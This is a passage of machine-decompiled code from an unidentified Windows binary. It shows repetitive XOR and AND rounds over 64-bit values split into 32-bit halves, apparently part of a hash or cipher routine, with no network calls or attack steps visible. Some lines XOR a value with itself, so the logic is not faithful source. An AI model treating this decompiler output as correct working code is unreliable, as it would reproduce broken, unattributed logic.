                                                                                                                                                                                                                                                                                    						_t1611 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2061 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2061 + 0x18 + _t1611 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2061 + 0x1c + _t1611 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1612 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1786 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1786 + _t1612 * 8 - 0x2a8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1786 + _t1612 * 8 - 0x2a4);
                                                                                                                                                                                                                                                                                    						_t1613 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1787 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1787 + _t1613 * 8 - 0x68);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1787 + _t1613 * 8 - 0x64);
                                                                                                                                                                                                                                                                                    						_t1614 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1788 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1441 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2066 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1788 + _t1614 * 8 - 0x70) &  *(_t2066 + _t1441 * 8 - 0x88) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1788 + _t1614 * 8 - 0x6c) &  *(_t2066 + _t1441 * 8 - 0x84) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1789 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1442 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1618 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2067 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1442 + _t1789 * 8 - 0xd8) &  *(_t2067 + _t1618 * 8 - 0x1f8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1442 + _t1789 * 8 - 0xd4) &  *(_t2067 + _t1618 * 8 - 0x1f4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1621 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2068 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2068 + 0x20 + _t1621 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2068 + 0x24 + _t1621 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1622 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1798 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1798 + _t1622 * 8 - 0x2a0);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1798 + _t1622 * 8 - 0x29c);
                                                                                                                                                                                                                                                                                    						_t1623 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1799 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1799 + _t1623 * 8 - 0x60);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1799 + _t1623 * 8 - 0x5c);
                                                                                                                                                                                                                                                                                    						_t1624 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1800 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1452 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2073 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1800 + _t1624 * 8 - 0x68) &  *(_t2073 + _t1452 * 8 - 0x80) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1800 + _t1624 * 8 - 0x64) &  *(_t2073 + _t1452 * 8 - 0x7c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1801 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1453 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1628 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2074 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1453 + _t1801 * 8 - 0xd0) &  *(_t2074 + _t1628 * 8 - 0x1f0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1453 + _t1801 * 8 - 0xcc) &  *(_t2074 + _t1628 * 8 - 0x1ec) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1631 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2075 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2075 + 0x28 + _t1631 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2075 + 0x2c + _t1631 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1632 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1810 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1810 + _t1632 * 8 - 0x298);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1810 + _t1632 * 8 - 0x294);
                                                                                                                                                                                                                                                                                    						_t1633 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1811 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1811 + _t1633 * 8 - 0x58);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1811 + _t1633 * 8 - 0x54);
                                                                                                                                                                                                                                                                                    						_t1634 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1812 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1463 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2080 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1812 + _t1634 * 8 - 0x60) &  *(_t2080 + _t1463 * 8 - 0x78) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1812 + _t1634 * 8 - 0x5c) &  *(_t2080 + _t1463 * 8 - 0x74) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1813 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1464 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1638 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2081 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1464 + _t1813 * 8 - 0xc8) &  *(_t2081 + _t1638 * 8 - 0x1e8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1464 + _t1813 * 8 - 0xc4) &  *(_t2081 + _t1638 * 8 - 0x1e4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1641 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2082 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2082 + 0x30 + _t1641 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2082 + 0x34 + _t1641 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1642 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1822 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1822 + _t1642 * 8 - 0x290);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1822 + _t1642 * 8 - 0x28c);
                                                                                                                                                                                                                                                                                    						_t1643 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1823 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1823 + _t1643 * 8 - 0x50);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1823 + _t1643 * 8 - 0x4c);
                                                                                                                                                                                                                                                                                    						_t1644 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1824 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1474 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2087 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1824 + _t1644 * 8 - 0x58) &  *(_t2087 + _t1474 * 8 - 0x70) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1824 + _t1644 * 8 - 0x54) &  *(_t2087 + _t1474 * 8 - 0x6c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1825 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1475 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1648 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2088 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1475 + _t1825 * 8 - 0xc0) &  *(_t2088 + _t1648 * 8 - 0x1e0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1475 + _t1825 * 8 - 0xbc) &  *(_t2088 + _t1648 * 8 - 0x1dc) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1651 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2089 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2089 + 0x38 + _t1651 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2089 + 0x3c + _t1651 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1652 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1834 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1834 + _t1652 * 8 - 0x288);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1834 + _t1652 * 8 - 0x284);
                                                                                                                                                                                                                                                                                    						_t1653 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1835 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1835 + _t1653 * 8 - 0x48);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1835 + _t1653 * 8 - 0x44);
                                                                                                                                                                                                                                                                                    						_t1654 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1836 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1485 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2094 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1836 + _t1654 * 8 - 0x50) &  *(_t2094 + _t1485 * 8 - 0x68) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1836 + _t1654 * 8 - 0x4c) &  *(_t2094 + _t1485 * 8 - 0x64) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1837 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1486 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1658 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2095 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1486 + _t1837 * 8 - 0xb8) &  *(_t2095 + _t1658 * 8 - 0x1d8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1486 + _t1837 * 8 - 0xb4) &  *(_t2095 + _t1658 * 8 - 0x1d4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1661 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2096 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2096 + 0x40 + _t1661 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2096 + 0x44 + _t1661 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1662 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1846 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1846 + _t1662 * 8 - 0x280);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1846 + _t1662 * 8 - 0x27c);
                                                                                                                                                                                                                                                                                    						_t1663 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1847 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1847 + _t1663 * 8 - 0x40);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1847 + _t1663 * 8 - 0x3c);
                                                                                                                                                                                                                                                                                    						_t1664 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1848 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1496 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2101 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1848 + _t1664 * 8 - 0x48) &  *(_t2101 + _t1496 * 8 - 0x60) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1848 + _t1664 * 8 - 0x44) &  *(_t2101 + _t1496 * 8 - 0x5c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1849 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1497 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1668 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2102 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1497 + _t1849 * 8 - 0xb0) &  *(_t2102 + _t1668 * 8 - 0x1d0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1497 + _t1849 * 8 - 0xac) &  *(_t2102 + _t1668 * 8 - 0x1cc) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1671 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2103 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2103 + 0x48 + _t1671 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2103 + 0x4c + _t1671 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1672 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1858 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1858 + _t1672 * 8 - 0x278);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1858 + _t1672 * 8 - 0x274);
                                                                                                                                                                                                                                                                                    						_t1673 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1859 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1859 + _t1673 * 8 - 0x38);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1859 + _t1673 * 8 - 0x34);
                                                                                                                                                                                                                                                                                    						_t1674 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1860 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1507 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2108 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1860 + _t1674 * 8 - 0x40) &  *(_t2108 + _t1507 * 8 - 0x58) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1860 + _t1674 * 8 - 0x3c) &  *(_t2108 + _t1507 * 8 - 0x54) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1861 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1508 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1678 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2109 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1508 + _t1861 * 8 - 0xa8) &  *(_t2109 + _t1678 * 8 - 0x1c8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1508 + _t1861 * 8 - 0xa4) &  *(_t2109 + _t1678 * 8 - 0x1c4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1681 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2110 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2110 + 0x50 + _t1681 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2110 + 0x54 + _t1681 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1682 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1870 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1870 + _t1682 * 8 - 0x270);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1870 + _t1682 * 8 - 0x26c);
                                                                                                                                                                                                                                                                                    						_t1683 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1871 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1871 + _t1683 * 8 - 0x30);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1871 + _t1683 * 8 - 0x2c);
                                                                                                                                                                                                                                                                                    						_t1684 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1872 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1518 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2115 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1872 + _t1684 * 8 - 0x38) &  *(_t2115 + _t1518 * 8 - 0x50) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1872 + _t1684 * 8 - 0x34) &  *(_t2115 + _t1518 * 8 - 0x4c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1873 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1519 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1688 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2116 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1519 + _t1873 * 8 - 0xa0) &  *(_t2116 + _t1688 * 8 - 0x1c0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1519 + _t1873 * 8 - 0x9c) &  *(_t2116 + _t1688 * 8 - 0x1bc) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1691 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2117 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2117 + 0x58 + _t1691 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2117 + 0x5c + _t1691 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1692 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1882 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1882 + _t1692 * 8 - 0x268);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1882 + _t1692 * 8 - 0x264);
                                                                                                                                                                                                                                                                                    						_t1693 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1883 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1883 + _t1693 * 8 - 0x28);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1883 + _t1693 * 8 - 0x24);
                                                                                                                                                                                                                                                                                    						_t1694 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1884 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1529 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2122 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1884 + _t1694 * 8 - 0x30) &  *(_t2122 + _t1529 * 8 - 0x48) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1884 + _t1694 * 8 - 0x2c) &  *(_t2122 + _t1529 * 8 - 0x44) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1885 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1530 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1698 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2123 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1530 + _t1885 * 8 - 0x98) &  *(_t2123 + _t1698 * 8 - 0x1b8) ^  *(_t2149 - 8);
